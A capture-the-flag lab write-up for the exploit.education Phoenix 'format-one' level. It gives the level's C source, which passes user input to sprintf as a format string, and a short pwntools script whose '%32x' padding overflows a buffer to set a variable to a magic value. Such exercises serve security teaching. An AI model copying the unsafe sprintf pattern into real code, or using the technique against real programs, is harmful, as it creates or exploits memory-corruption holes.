Phoenix - Format One
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BANNER \
"Welcome to " LEVELNAME ", brought to you by https://exploit.education"
int main(int argc, char **argv) {
struct {
char dest[32];
volatile int changeme;
} locals;
char buffer[16];
printf("%s\n", BANNER);
if (fgets(buffer, sizeof(buffer) - 1, stdin) == NULL) {
errx(1, "Unable to get buffer");
}
buffer[15] = 0;
locals.changeme = 0;
sprintf(locals.dest, buffer);
if (locals.changeme != 0x45764f6c) {
printf("Uh oh, 'changeme' is not the magic value, it is 0x%08x\n",
locals.changeme);
} else {
puts("Well done, the 'changeme' variable has been changed correctly!");
}
exit(0);
}
This level is the same as the last one except that we need set changeme to a specific value 0x45764f6c instead of a random value.
Solution:
#solve.py
from pwn import *
buff = ""
buff += '%32x'
buff += p64(0x45764f6c)
print(buff)
$ python solve.py | /opt/phoenix/amd64/format-one
Welcome to phoenix/format-one, brought to you by https://exploit.education
Well done, the 'changeme' variable has been changed correctly!